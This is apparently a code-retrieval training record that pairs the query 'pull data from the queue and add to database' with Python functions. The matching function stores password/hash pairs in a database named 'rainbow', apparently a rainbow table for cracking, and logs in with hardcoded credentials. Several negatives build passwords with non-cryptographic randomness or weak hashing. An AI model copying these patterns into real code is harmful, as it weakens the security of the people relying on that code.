YubikeyOTP, *args : bytes\n ) -> bytes:\n return self._context_kdf.derive(\n combine_keys(\n passphrase.encode('utf-8'),\n otp.token.private_uid,\n *args\n )\n )", "def set_password(self, password):\n self.password = generate_password_hash(password, method='pbkdf2:sha256')", "def passphrase():\n a = []\n for i in range(1,6):\n a.append(password())\n # join words into phrase\n p = \" \".join(a)\n # split phrase into a list\n p = list(p)\n # substitute a random character\n rc = \"\"\"1~!#$%^2&*()-=3+[]\\{}4:;\"'<>5?/01236456789\"\"\"\n p[secrets.choice(range(0,len(p)))] = rc[secrets.choice(range(0,len(rc)))]\n # put phrase back together\n p = \"\".join(p)\n return p", "def password_generator(length=8):\n chars = tuple(ascii_letters) + tuple(digits) + tuple(punctuation)\n return \"\".join(choice(chars) for x in range(length))", "def _hashPassword(password):\n charset = './' + ascii_letters + digits\n return crypt.crypt(password, ''.join(random.sample(charset, 2)))", "def genPassword(charOrWords):\n\tcurrentGenPasswordMethod.set(charOrWords)\n\tif charOrWords == \"words\":\n\t\t#Get the data from sliders etc\n\t\tnumberOfWords=genPasswordWordsLengthSlider.getValue()\n\t\tseperator=genPasswordWordsSeperatorVar.get()\n\t\tcommonWords=genPasswordWordCommonVar.get()\n\t\tpassword=generateWordPassword(numberOfWords,seperator,commonWords)\n\telse:\n\t\t#Get the length and amount of symbols 
etc\n\t\tnumberOfCharacters=genPasswordCharLengthSlider.getValue()\n\t\tnumberOfDigits=genPasswordDigitsSlider.getValue()\n\t\tnumberOfSymbols=genPasswordSymbolsSlider.getValue()\n\t\t#Generate the password\n\t\tpassword=generatePassword(numberOfCharacters,numberOfSymbols,numberOfDigits)\n\tgenPasswordVar.set(password)\n\n\t#Calculate password strength\n\tpasswordStrength=calculatePasswordStrength(password,split=genPasswordWordsSeperatorVar.get())\n\tpasswordScoreString=passwordStrength[5]\n\t#Show labels\n\tif passwordScoreString == \"Strong\":\n\t\tgenPasswordStrengthVar.set(\"Strong password\")\n\t\tgenPasswordLabel.config(fg=\"#66BC15\")\n\n\telif passwordScoreString == \"Medium\":\n\t\tgenPasswordStrengthVar.set(\"Medium password\")\n\t\tgenPasswordLabel.config(fg=mainOrangeColour)\n\n\telse:\n\t\tgenPasswordStrengthVar.set(\"Weak password\")\n\t\tgenPasswordLabel.config(fg=mainRedColour)\n\n\t#Add to the review screen\n\taddDataToWidget(genReviewEntry,password)\n\treviewPassword()", "def _password_generator(size: int = 12, chars: Optional[str] = None) -> str:\n if chars is None:\n chars = string.ascii_letters + string.digits\n return ''.join(random.choice(chars) for _ in range(size))", "def new_password():\n new_pass = generate_password()\n entry_pass.delete(0, END)\n entry_pass.insert(0, new_pass)", "async def password(self, ctx):\n pass", "def build_passwords(self, ad_hoc_command, runtime_passwords):\n passwords = super(RunAdHocCommand, self).build_passwords(ad_hoc_command, runtime_passwords)\n cred = ad_hoc_command.credential\n if cred:\n for field in ('ssh_key_unlock', 'ssh_password', 'become_password'):\n value = runtime_passwords.get(field, cred.get_input('password' if field == 'ssh_password' else field, default=''))\n if value not in ('', 'ASK'):\n passwords[field] = value\n return passwords", "def generate_user(username, passwd, ctype=\"crypt\"):\n return \"%s:%s\" % (username, hash_password(passwd, ctype))", "def password_generator(self):\n password_list = []\n for generated in JugglerPassGen.generate(self.word): # call the function for permutations\n password_list.append(generated)\n return password_list", "def generate_password():\n numbers = ['0', '1', '2', '3', '4', '5'] \n chars = [\"A\", \"B\", \"C\", \"D\", \"E\"]\n temp_passs = \"\"\n temp_pass = \"\"\n\n for i in range(4):\n rand_num = random.choice(numbers)\n temp_pass += temp_pass.join(rand_num)\n # rand_chars = random.choice(chars)\n for i in range(4):\n rand_chars = random.choice(chars)\n temp_passs += temp_passs.join(rand_chars)\n return(temp_pass + \"-\" + temp_passs)", "def password (string):\n\t\n\treturn hexdigest_mySQL41plus (string)", "def generate_password() -> str:\n list_letters = [choice(LETTERS) for _ in range(randint(8, 10))]\n list_symbols = [choice(SYMBOLS) for _ in range(randint(2, 4))]\n list_numbers = [choice(NUMBERS) for _ in range(randint(2, 4))]\n password_list = [n for n in list_letters + list_symbols + list_numbers]\n shuffle(password_list)\n return \"\".join(password_list)", "def gen_pass(*, pw_length=10, use_nums=True, use_special=True,\n no_dupes=False, no_ambiguous=True):\n # Build up desired population of characters\n charset = LETTERS\n if use_nums:\n charset += NUMS\n if use_special:\n charset += SPECIALS\n if no_ambiguous:\n charset = ''.join([x for x in charset if x not in AMBIGUOUS])\n\n if no_dupes:\n x, tmp = pw_length, []\n while x > 0:\n val = ''.join(random.sample(charset, 1))\n if val not in tmp:\n tmp.append(val)\n x -= 1\n return ''.join(tmp)\n else:\n return 
''.join(random.sample(charset, pw_length))", "def generate_password(self, length):\n items = [\"a\", \"e\", \"i\", \"o\", \"u\", \"1\", \"2\", \"4\", \"5\", \"7\", \"8\", \"9\"]\n\n new_password = \"\"\n while(len(new_password) < length):\n item = items[randint(0, len(items) - 1)]\n new_password += item\n return new_password", "def password(self, password):\n self.password_hash = generate_password_hash(password)", "def password(self, password):\n self.password_hash = generate_password_hash(password)", "def password(self, password):\n self.password_hash = generate_password_hash(password)", "def password(self, password):\n self.password_hash = generate_password_hash(password)", "def create_password_hash(self, password):\n return pbkdf2_sha256.encrypt(password, rounds=1000, salt_size=16)", "def generate_password(stringLength):\n lettersAndDigits = string.ascii_letters + string.digits\n password = ''.join(random.choice(lettersAndDigits)\n for i in range(stringLength))\n add_credential(social, username, password)\n print(\">Generated password: {}\".format(password))\n return", "def generate_password(self): \n\n password = []\n length = input(\"Enter Length for Password (At least 8): \")\n\n if length.lower().strip() == \"exit\":\n raise UserExits\n elif length.strip() == \"\":\n raise EmptyField\n elif int(length) < 8:\n raise PasswordNotLongEnough\n else:\n # generating a password\n spinner = Halo(text=colored(\"Generating Password\", \"green\"), spinner=self.dots_, color=\"green\")\n spinner.start()\n for i in range(0, int(length)):\n #choose character from one of the lists randomly\n password.append(random.choice(random.choice([string.ascii_lowercase, string.ascii_uppercase, string.digits, self.specialChar_])))\n\n finalPass = \"\".join(password)\n spinner.stop()\n\n return finalPass", "def new_password(self):\n # create new password\n return password_generator.create_password()\n # have password reset", "def _set_password(self, password):\n self._password = generate_password_hash(password)", "def password(length,num=False,strength='weak'):\r\n lower = string.ascii_lowercase\r\n upper = string.ascii_uppercase\r\n letter = lower + upper\r\n dig = string.digits\r\n punct = string.punctuation\r\n pwd = ''\r\n if strength == 'weak':\r\n if num:\r\n length -= 2\r\n for i in range(2):\r\n pwd += random.choice(dig)\r\n for i in range(length):\r\n pwd += random.choice(lower)\r\n\r\n elif strength == 'strong':\r\n if num:\r\n length -=2\r\n for i in range(2):\r\n pwd += random.choice(dig)\r\n for i in range(length):\r\n pwd += random.choice(letter)\r\n elif strength == 'very':\r\n ran = random.randint(2,4)\r\n if num:\r\n length -= ran\r\n for i in range(ran):\r\n pwd += random.choice(dig)\r\n length -= ran\r\n for i in range(ran):\r\n pwd += random.choice(punct)\r\n for i in range(length):\r\n pwd += random.choice(letter)\r\n pwd = list(pwd)\r\n random.shuffle(pwd)\r\n return ''.join(pwd)", "def password(customer_info, stringLength=5):\n letters = string.ascii_lowercase\n rand_string = ''.join(random.choice(letters) for i in range(stringLength))\n user_password = rand_string + str(customer_info[0][0:2] + customer_info[1][-2:])\n return user_password", "def setpassword(self, pwd):\n pass", "def gen_passphrase(self):\n return ''.join(\n random.sample(map(str, range(0,10)) +\n map(chr, range(ord('a'), ord('z') + 1)) +\n map(chr, range(ord('A'), ord('Z') + 1)), self.passphraselen))", "def pwgen(length=16, ichars=string.ascii_letters+string.digits):\n return ''.join(random.choice(ichars) for i in 
range(length))", "def _buildPassword(username, createdTime, password):\n if not password:\n return ''\n\n tmp = ''.join((username, str(createdTime).split('.')[0], password, settings['salt']))\n\n sha1 = hashlib.sha224()\n sha1.update(tmp)\n\n return sha1.hexdigest()", "def encrypt_password(password,salt=None):\n\tif salt is None:\n\t\tsalt = os.urandom(8) #64 bits\n\n\tassert 8 == len(salt)\n\tassert isinstance(salt,str)\n\n\tif isinstance(password,unicode):\n\t\tpassword = password.encode('UTF-8')\n\n\tassert isinstance(password,str)\n\n\tresult = password\n\tfor i in xrange(10):\n\t\tresult = HMAC(result,salt,sha256).digest()\n\treturn salt + result", "def _random_password(self):\n return ''.join([\n random.choice(string.ascii_letters + string.digits)\n for _ in range(12)\n ])", "def create_passlocker(username, userpasslock, email):\n new_passlocker = passlocker(username, userpasslock, email)", "def encrypt_password(password: str) -> str:\n return pwd_context.hash(password)", "def passwd_encryption(self):\n key = Fernet.generate_key()\n cipher_suite = Fernet(key)\n bin_passwd = bytes(self.password, 'utf-8')\n ciphered_text = cipher_suite.encrypt(bin_passwd)\n with open(self.pass_path, 'wb') as pass_output:\n pass_output.write(ciphered_text)\n with open(self.key_path, 'wb') as key_output:\n key_output.write(key)", "def __hash_new_password(password: str) -> Tuple[bytes, bytes]:\n salt = os.urandom(16)\n pw_hash = hashlib.pbkdf2_hmac(\"sha256\", password.encode(), salt, 100000)\n return salt, pw_hash", "def randompassword():\n characters = string.ascii_uppercase + string.ascii_lowercase + string.digits\n size = random.randint(8, 12)\n return ''.join(random.choice(characters) for x in range(size))", "def _generateSecretKey():\n return f\"secret.{str(datetime.now())}\"", "def get_password(wordlen, digitlen, words, strength):\n\n while True:\n\n try:\n w = words.pop().capitalize()\n except IndexError:\n sys.exit(\"Unable to get a sufficiently strong password\")\n\n s = np.random.choice(SPECIAL_CHARS)\n i = np.random.randint(0, 10**digitlen)\n\n comp = [w, f\"{i:0{digitlen}d}\", s, s]\n np.random.shuffle(comp)\n pw = ''.join(comp)\n\n # pw = str(f\"{s}{w}{i:0{digitlen}d}{s}\")\n stats_pw = PasswordStats(pw)\n\n if stats_pw.strength() >= strength:\n return pw, stats_pw", "def password(self, password):\n\n self.password_hash = generate_password_hash(password)", "def _generateSecretKey():\n return ''.join(SystemRandom().choice(string.ascii_letters + string.digits) for _ in range(20))", "def __generate_hash(password):\n if password is None:\n return None\n return bcrypt.generate_password_hash(password, rounds=10).decode(\"utf8\")", "def make_salt():\n return ''.join(random.choice(string.letters) for x in xrange(5))", "def randomPassword(self):\n pwd = \"\"\n charsLength = len(self.chars)\n for i in range(self.pwdLength):\n pwd += self.chars[randrange(charsLength)]\n return pwd", "def generate_password_hash(event=None, user_id=None):\n\n suffix_key = f'password{event}'\n hexkey = str.encode(f'{user_id}{suffix_key}')\n\n # md5 value[1:10] + 1\n passwd = '{0}{1}'.format(hashlib.md5(hexkey).hexdigest()[1:10], 1)\n\n return passwd", "def build_passwords(self, instance, runtime_passwords):\n return {\n 'yes': 'yes',\n 'no': 'no',\n '': '',\n }", "def xkcd_password(number_of_words: int = 4) -> str:\n with open('/usr/share/dict/words') as f:\n words = [word.strip() for word in f]\n password = ' '.join(secrets.choice(words) for i in range(number_of_words))\n return password", "def newPassword(a, b):\n if 
len(a) > len(b):\n return combine(a[:len(b)], b) + a[len(b):]\n elif len(a) < len(b):\n return combine(a, b[:len(a)]) + b[len(a):]\n else:\n return combine(a, b)" ]
[ "0.68011814", "0.6634942", "0.65811294", "0.6548595", "0.6521094", "0.64116335", "0.6410874", "0.6394931", "0.63810545", "0.637443", "0.6355256", "0.63321126", "0.63251275", "0.6267523", "0.62596804", "0.62588465", "0.6251437", "0.62477094", "0.6220845", "0.62131107", "0.6190429", "0.61877793", "0.6171936", "0.6162081", "0.6158861", "0.6154047", "0.6141332", "0.6080049", "0.6059574", "0.60545135", "0.6039777", "0.6035047", "0.603291", "0.60274035", "0.60267496", "0.6018977", "0.59869", "0.5985532", "0.59819055", "0.5967296", "0.59647375", "0.59597206", "0.59459454", "0.59384114", "0.59305125", "0.59195876", "0.59146225", "0.59129363", "0.5909479", "0.5905194", "0.58984643", "0.5875557", "0.58741933", "0.5870111", "0.58552915", "0.58521193", "0.5849128", "0.58482516", "0.5847766", "0.58462924", "0.58443534", "0.583543", "0.5834108", "0.58306265", "0.58135337", "0.5804498", "0.57951015", "0.5790844", "0.57874894", "0.57874894", "0.57874894", "0.57874894", "0.57842046", "0.57767123", "0.57760954", "0.57731926", "0.575852", "0.57474446", "0.57465863", "0.57396674", "0.57275456", "0.5724136", "0.57185185", "0.5716103", "0.5700844", "0.5696929", "0.56967443", "0.5695713", "0.56900716", "0.5680892", "0.5680694", "0.5679842", "0.5678733", "0.56758064", "0.5673807", "0.5672365", "0.56450397", "0.56437695", "0.56389284", "0.5638245", "0.5634251" ]
0.0
-1
pull data from the queue and add to database
def record_data(q): db = psycopg2.connect( dbname='rainbow', host='humpy', user='rainbow', password='bowrain', ); cur = db.cursor(); while True: vals = q.get() for val in vals: #print val['h'] try: cur.execute(""" INSERT INTO three_des (pass, hash) VALUES(%(p)s, %(h)s) """, val ) except: print "Failed to insert" db.commit() q.task_done()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def worker(self, queue):\n with sa.create_engine(dsn).connect() as dbcon:\n while True:\n if queue.qsize() == 0:\n sleep(1)\n if queue.qsize() == 0:\n break\n continue\n item = queue.get()\n try:\n if hash(item['title']) in self.exist_products:\n dbcon.execute(Product.update().values(**item).where(Product.c.id == self.get_id(item)))\n else:\n result = dbcon.execute(Product.insert().values(**item))\n self.exist_products[hash(item['title'])] = result.inserted_primary_key[0]\n except Exception as e:\n print(type(e), e)", "def queue_handler(self):\n work_queue = []\n query_count = 0\n\n while query_count < self.count:\n work_queue.append(self.build_packet(self.record))\n query_count += 1\n\n self.send_queries(work_queue)", "def run(self):\n while True :\n try :\n instance_id = self.queue.get()\n db.hset(application_name,instance_id,1)\n except:\n pass\n finally:\n pass", "def on_yt_video_queue_add(self, data):\n # video_time = data[6]\n # queue number? = data[7]\n print ('%s added %s (%s) to the video queue.' % (data[3], data[5], data[4]))", "def collect_data(self):\n self.logger.info(\"Waiting for incoming data ...\")\n while True:\n item = self.in_queue.get()\n self.logger.info(\"Received data!\")\n self.collector_process_data(item)", "def _mq_callback(self, message):\n try:\n raw_data = RawData(message.body)\n try:\n session = self.ss_dao.get_one(raw_data.key[0], raw_data.session_id)\n\n # update the click_xxx info\n session = self.update_session_body(raw_data, session)\n duration = raw_data.key[1] - time_helper.session_to_epoch(session.key[1])\n session.total_duration = duration\n\n index = session.number_of_entries\n self.add_entry(session, index, raw_data)\n self.performance_ticker.update.increment_success()\n except LookupError:\n # insert the record\n session = SingleSession()\n\n # input data constraints - both session_id and user_id must be present in MQ message\n session.key = (raw_data.key[0], time_helper.raw_to_session(raw_data.key[1]))\n session.session_id = raw_data.session_id\n session.ip = raw_data.ip\n session.total_duration = 0\n\n session = self.update_session_body(raw_data, session)\n self.add_entry(session, 0, raw_data)\n self.performance_ticker.insert.increment_success()\n\n if time.time() - self._last_safe_save_time < self.SAFE_SAVE_INTERVAL:\n is_safe = False\n else:\n is_safe = True\n self._last_safe_save_time = time.time()\n\n self.ss_dao.update(session, is_safe)\n self.consumer.acknowledge(message.delivery_tag)\n except AutoReconnect as e:\n self.logger.error('MongoDB connection error: %r\\nRe-queueing message & exiting the worker' % e)\n self.consumer.reject(message.delivery_tag)\n raise e\n except (KeyError, IndexError) as e:\n self.logger.error('Error is considered Unrecoverable: %r\\nCancelled message: %r' % (e, message.body))\n self.consumer.cancel(message.delivery_tag)\n except Exception as e:\n self.logger.error('Error is considered Recoverable: %r\\nRe-queueing message: %r' % (e, message.body))\n self.consumer.reject(message.delivery_tag)", "def enqueue(self, record):\r\n self.queue.put_nowait(record)", "def set_queue_data(data):\n while(not grove_queue.empty):\n grove_queue.get()\n grove_queue.put(data)", "def collect(self):\n while True:\n if not self._queue.empty():\n message = self._queue.get()\n self.working_on = message['job_type']\n else:\n break\n logging.info(\"Popped off message: {}\\n\".format(str(message)))\n\n if message['job_type'] == 'STOP':\n break\n\n if message['job_type'] != 'MAINTAIN' and message['job_type'] != 'UPDATE':\n raise 
ValueError('{} is not a recognized task type'.format(message['job_type']))\n pass\n\n # Query all repos with repo url of given task\n repoUrlSQL = s.sql.text(\"\"\"\n SELECT min(repo_id) as repo_id FROM repo WHERE repo_git = '{}'\n \"\"\".format(message['given']['github_url']))\n repo_id = int(pd.read_sql(repoUrlSQL, self.db, params={}).iloc[0]['repo_id'])\n\n try:\n if message['models'][0] == 'pull_requests':\n self.pull_requests_model(message, repo_id)\n elif message['models'][0] == 'pull_request_commits':\n self.pull_request_commits_model(message, repo_id)\n elif message['models'][0] == 'pull_request_files':\n self.pull_requests_graphql(message, repo_id)\n except Exception as e:\n register_task_failure(self, message, repo_id, e)\n pass", "def runQueueEnqueue(self):\n raise NotImplementedError", "def collect(self):\n while True:\n if not self._queue.empty():\n message = self._queue.get()\n self.working_on = message['job_type']\n else:\n break\n logging.info(\"Popped off message: {}\\n\".format(str(message)))\n\n if message['job_type'] == 'STOP':\n break\n\n if message['job_type'] != 'MAINTAIN' and message['job_type'] != 'UPDATE':\n raise ValueError('{} is not a recognized task type'.format(message['job_type']))\n pass\n\n \"\"\" Query all repos with repo url of given task \"\"\"\n repoUrlSQL = s.sql.text(\"\"\"\n SELECT min(repo_id) as repo_id FROM repo WHERE repo_git = '{}'\n \"\"\".format(message['given']['git_url']))\n repo_id = int(pd.read_sql(repoUrlSQL, self.db, params={}).iloc[0]['repo_id'])\n\n try:\n if message['models'][0] == 'badges':\n self.badges_model(message, repo_id)\n except Exception as e:\n register_task_failure(self, logging, message, repo_id, e)\n pass", "def load_queue(self, queue=None):\n if not queue:\n return False\n elif queue == \"ready_queue\":\n table = \"tangerine\"\n condition = \" WHERE state='ready';\"\n elif queue == \"job_queue\":\n table = \"jobs\"\n condition = \"\"\n else:\n table = \"tangerine\"\n condition = \"\"\n \n cur = self.conn.cursor()\n cur.execute(\"LOCK TABLE \" + queue + \" IN ACCESS EXCLUSIVE MODE;\")\n \n cur.execute(\"SELECT COUNT(id) FROM \" + queue + \";\")\n\n # if the queue still has tasks return nothing\n if cur.fetchone()[0]:\n self.conn.rollback()\n else:\n cur.execute(\"SELECT COUNT(id) FROM \" + table + condition + \";\")\n\n # If the task table is empty return nothing\n if not cur.fetchone()[0]:\n self.conn.commit()\n return\n \n cur.execute(\"SELECT id FROM \" + table + condition + \";\")\n ids = (\"(\" + str(id[0]) + \")\" for id in cur.fetchall())\n cur.execute(\"INSERT INTO \" + queue + \" VALUES \" + \", \".join(ids) + \";\")\n self.conn.commit()", "def _update(self, data):\n if len(data) > 0:\n for q in self._queues.values():\n q.put(data)", "def last_buy(self):\n multi_data = []\n while not self.infoQueue.empty():\n multi_data.append(self.infoQueue.get_nowait())\n self.redisHandle.set_multiple_data(multi_data)\n print(\"flush all data\")", "def test_queue_integration(self):\n from solariat_bottle.settings import LOGGER\n from solariat_bottle.db.channel.twitter import TwitterServiceChannel\n from solariat_bottle.db.historic_data import QueuedHistoricData\n from solariat_bottle.db.post.base import Post\n from solariat_bottle.daemons.twitter.historics.timeline_request import \\\n DirectMessagesRequest, SentDirectMessagesRequest, SearchRequest, UserTimelineRequest\n from solariat_bottle.db.user_profiles.user_profile import UserProfile\n\n # reduce amount of data for long-running integration test\n 
FakeTwitterApi.SEARCH_DATA_LENGTH = 50\n FakeTwitterApi.TIMELINE_DATA_LENGTH = 50\n FakeTwitterApi.DM_DATA_LENGTH = 50\n FakeTwitterApi.DM_SENT_DATA_LENGTH = 50\n FakeTwitterApi.ALL_DATA_LENGTH = 200\n FakeTwitterApi.CREATED_FROM = FakeTwitterApi.CREATED_TO - timedelta(days=1)\n FakeTwitterApi.init_next_params()\n SearchRequest.SEARCH_LIMIT = 10\n UserTimelineRequest.FETCH_LIMIT = 20\n DirectMessagesRequest.DIRECT_MESSAGES_LIMIT = 20\n SentDirectMessagesRequest.DIRECT_MESSAGES_LIMIT = 20\n\n profile = UserProfile.objects.upsert('Twitter', profile_data=dict(user_name='jarvis', user_id='99188210'))\n channel = TwitterServiceChannel.objects.create_by_user(self.user, title='SC')\n channel.add_username(profile.user_name)\n channel.add_keyword(u'keywörd')\n\n def get_id_date_pair(post_data):\n if 'twitter' in post_data:\n post_data = post_data['twitter']\n return int(post_data['id']), post_data['created_at']\n\n fetched_data = []\n def _save_tweets(fn):\n def decorated(tweets, *args, **kwargs):\n LOGGER.debug('PUSH_POSTS, len:%s', len(tweets))\n fetched_data.extend([get_id_date_pair(t) for t in tweets])\n return fn(tweets, *args, **kwargs)\n return decorated\n\n queued_data = []\n def _save_queued_data(method):\n def _method(*args, **kwargs):\n queued_data[:] = [\n get_id_date_pair(i.solariat_post_data) for i in\n QueuedHistoricData.objects(subscription=subscription)\n ]\n LOGGER.debug('QUEUED_POSTS, len: %s', len(queued_data))\n self.assertTrue(len(queued_data) == FakeTwitterApi.ALL_DATA_LENGTH,\n msg=\"len=%d %s\" % (len(queued_data), queued_data))\n self.assertEqual(set(queued_data), set(fetched_data),\n msg=u\"\\nqueued =%s\\nfetched=%s\" % (queued_data, fetched_data))\n return method(*args, **kwargs)\n return _method\n\n subscription = TwitterRestHistoricalSubscription.objects.create(\n created_by=self.user,\n channel_id=channel.id,\n from_date=FakeTwitterApi.CREATED_FROM,\n to_date=FakeTwitterApi.CREATED_TO\n )\n subscriber = TwitterHistoricsSubscriber(subscription)\n subscriber.push_posts = _save_tweets(subscriber.push_posts)\n subscriber.historic_loader.load = _save_queued_data(subscriber.historic_loader.load)\n\n subscriber.start_historic_load()\n self.assertEqual(subscriber.get_status(), SUBSCRIPTION_FINISHED)\n\n self.assertEqual(Post.objects(channels__in=[\n subscription.channel.inbound,\n subscription.channel.outbound]).count(), FakeTwitterApi.ALL_DATA_LENGTH)\n\n SearchRequest.SEARCH_LIMIT = 100\n UserTimelineRequest.FETCH_LIMIT = 200\n DirectMessagesRequest.DIRECT_MESSAGES_LIMIT = 200\n SentDirectMessagesRequest.DIRECT_MESSAGES_LIMIT = 200", "def dequeue(self):", "def write_data(self,queue):\n raise NotImplementedError('Abstract method has not been implemented')", "async def queue(self, msg, song):\n title1 = await Downloader.get_info(self, url=song)\n title = title1[0]\n data = title1[1]\n # NOTE:needs fix here\n if data['queue']:\n await self.playlist(data, msg)\n # NOTE: needs to be embeded to make it better output\n return await msg.send(f\"Added playlist {data['title']} to queue\")\n self.player[msg.guild.id]['queue'].append(\n {'title': title, 'author': msg})\n return await msg.send(f\"**{title} added to queue**\".title())", "def _put(self, item, queue):", "def __init__(self):\n self.queues=[]", "async def playlist(self, data, msg):\n for i in data['queue']:\n print(i)\n self.player[msg.guild.id]['queue'].append(\n {'title': i, 'author': msg})", "def process_queued_msg(self):\n try:\n while not self.queue.empty():\n port, tbl = self.queue.get()\n reveived_port = 
self.switches[port.neighbor_switch_dpid].ports[port.neighbor_port_no]\n self.tbl.update_by_neighbor(reveived_port, port, tbl)\n self.deploy_routing_table()\n except:\n pass", "def creator(data, q):\n print('Creating data and putting it on the queue')\n for item in data:\n q.put(item)", "def declare(self):\n self.channel.queue_declare(queue='files_to_database')", "def __init__(self):\n self.data = Queue()", "def get_from_queue(self):\n while not self.receive_queue.empty():\n cmd, kwargs = bcp.decode_command_string(\n self.receive_queue.get(False))\n self._process_command(cmd, **kwargs)", "def ztest_sql_queue(self):\n \n sql_queue = SQLQueue()\n \n #insertion\n for i in range(10):\n item = NMSQueueItem(5,\"data %s\" % (i))\n item.set_uuid()\n sql_queue.put(item.dictify())\n \n size = sql_queue.size()\n \n while size != 0:\n the_dict = sql_queue.pop()\n item = NMSQueueItem.create_from_dict(the_dict)\n print(\"size = %d, item = %s\\n\" % (size, item))\n size = sql_queue.size()\n \n print(\"size = %s\" % size )", "def add_to_queue(self, name, pic_num, crop_num):\n #if the picture is not already in the queue\n #and if it is not already downloaded\n if ((self.communicator.image_store.get_crop(pic_num, crop_num).inqueue == False) & \\\n (self.communicator.image_store.get_crop(pic_num, crop_num).completed == False)):\n #insert in queue\n myiter = self.list_store.append(None)\n #set the data in column 0\n #if the picture is ready for download set color to black\n if (self.communicator.image_store.get_crop(pic_num, crop_num).available == True):\n self.list_store.set_value(myiter, \\\n 0, '<span foreground=\"#000000\"><b>' + name + '</b></span>')\n #otherwise set to gray\n else:\n self.list_store.set_value(myiter, \\\n 0, '<span foreground=\"#A0A0A0\"><b>' + name + '</b></span>')\n #set the data in column 1 and 2\n self.list_store.set_value(myiter, 1, pic_num)\n self.list_store.set_value(myiter, 2, crop_num)\n #let model know picture is inqueue\n self.communicator.image_store.get_crop(pic_num, crop_num).inqueue = True\n #call queue_changed function\n self.queue_changed()\n elif self.communicator.image_store.get_crop(pic_num, crop_num).completed == True:\n print \"image has already been downloaded\"\n else:\n print \"image is currently in the queue\"", "def __init__(self): \n self.queue = []", "def run(self):\n while True :\n try:\n instance_id = os.getenv(\"CF_INSTANCE_INDEX\")\n mydict = db.hgetall(application_name)\n if instance_id not in mydict :\n self.queue.put(instance_id)\n except :\n pass\n finally:\n pass", "def __init__(self):\r\n self.queue = []", "def __init__(self):\r\n self.queue = []", "def add_queue(self, queue):\n\n queue_id = queue[\"ovsdb:queues\"][0][\"queue-id\"]\n self.queue_dict[queue_id] = queue", "def queue (self):\n\n with self.__t.steps():\n import exception\n from lib import schema\n from lib import common\n from lib import process\n from lib import data\n from sqlalchemy import and_\n import json\n from collections import OrderedDict\n\n with schema.select(\"process_queue\", schema.table.process_queue.status==None) as select:\n for queued in select.limit(1000).all():\n blocked = False\n if len(queued.depend) > 0:\n for depend_id in queued.depend:\n depend = schema.select_one(\"series\", schema.table.series.id==depend_id)\n match_tags = json.dumps(OrderedDict(sorted(data.decode_tags(depend.tags).items())))\n if depend and schema.select_one(\"process_queue\", schema.table.process_queue.tags==match_tags):\n blocked = True\n break # queued dependencies\n if not blocked:\n 
queued.status = \"queued\"\n schema.save(queued)\n run.apply_async([queued.tags]) #queue process\n self.__t.ok()\n self.apply_async(queue=\"control\", countdown=30) #queue next", "def enqueue(self, server_id, url, title, duration, user):\n srv = self.get_server_dict(server_id)\n srv['queue'].append( (url, title, duration, user) )", "def run(self) -> None:\n while self.data_incoming or len(self._queue):\n if not self._queue:\n logging.info(\"Consumer %d is sleeping since queue is empty\", self._name)\n time.sleep(0.75)\n print(self._queue.get())\n time.sleep(0.5)", "def submit_to_queue(queue_df, conn, table_name):\n queue_df.to_sql(con=conn, name=table_name, if_exists='replace', index=False)\n print 'Inserted ' + str(len(queue_df)) + ' records to the task_queue'", "def __init__(self):\n self.queue = []", "def __init__(self):\n self.queue = []", "def __init__(self):\n self.queue = []", "def __init__(self):\n self.queue = []", "def __init__(self):\n self.queue = []", "def dump_queue(self):\n self.set_polling_many(self.queue)\n self.queue = []", "def __init__(self):\n self.queue = []\n self.queue.append(Queue())\n self.queue.append(Queue())\n self.tag = 0 # using to record which queue contain the data", "def put(self, conn):\r\n self.queue.append((conn, time.time()))", "def service_queue(queue, result_id, dut, dut_id):\n mdb = get_autotest()\n ldb = get_logging()\n count = 0\n while 1:\n mesg =queue.get()\n if mesg == 'finish':\n print >>sys.stderr, '[logged %d lines to %s for %s]' % (\n count, result_id, dut)\n break\n (ts, kind, message) = mesg\n count += 1\n if type(message) ==type(''):\n message = unicode(message, encoding='utf8')\n if type(kind) == type(''):\n kind = unicode(kind, encoding = 'utf8')\n handle = '%s_%d_%f_%s' % (dut if dut else dut_id, count, ts, HOSTNAME)\n \n terms = {'message':message, 'kind': kind, 'time': ts, '_id': handle}\n if dut_id:\n terms['dut_id'] = dut_id\n if dut:\n terms['dut_name'] = dut\n if result_id:\n terms['result_id'] = result_id\n if kind in ['HEADLINE', 'RESULT'] and result_id and dut:\n rdoc = mdb.results.find_one({'_id':result_id})\n if rdoc:\n build = rdoc.get('build')\n if build:\n set_build_information(build, \n {'test_status': [ts, dut, message]})\n else:\n print 'no build for headline'\n else:\n print 'no result for headline'\n ldb.logs.save(terms)", "def _enqueue_task(self):\n\t\t# TODO(bslatkin): Remove these retries when they're not needed in userland.\n\t\tRETRIES = 3\n\t\ttarget_queue = os.environ.get('X_APPENGINE_QUEUENAME', constants.FEED_QUEUE)\n\t\tfor i in xrange(RETRIES):\n\t\t\ttry:\n\t\t\t\ttaskqueue.Task(\n\t\t\t\t\t\turl='/work/pull_feeds',\n\t\t\t\t\t\teta=self.eta,\n\t\t\t\t\t\tparams={'topic': self.topic}\n\t\t\t\t\t\t).add(target_queue)\n\t\t\texcept (taskqueue.Error, apiproxy_errors.Error):\n\t\t\t\tlogging.exception('Could not insert task to fetch topic = %s',\n\t\t\t\t\t\t\t\t\t\t\t\t\tself.topic)\n\t\t\t\tif i == (RETRIES - 1):\n\t\t\t\t\traise\n\t\t\telse:\n\t\t\t\treturn", "def dequeue(self):\n pass", "def dequeue(self):\n pass", "def read_queue(self):\n query = \"\"\"SELECT server,\n otp,\n modified,\n info,\n server_nonce\n FROM queue\"\"\"\n self._execute(query)\n return self._dictfetchall()", "def add_to_queue(self, items):\n\n for i in items:\n self.r.rpush(self.joblist, i)", "def auto_import_product_queue_line_data(self):\n # change by bhavesh jadav 03/12/2019 for process only one queue data at a time\n query = \"\"\"select product_data_queue_id from shopify_product_data_queue_line_ept where state='draft' ORDER 
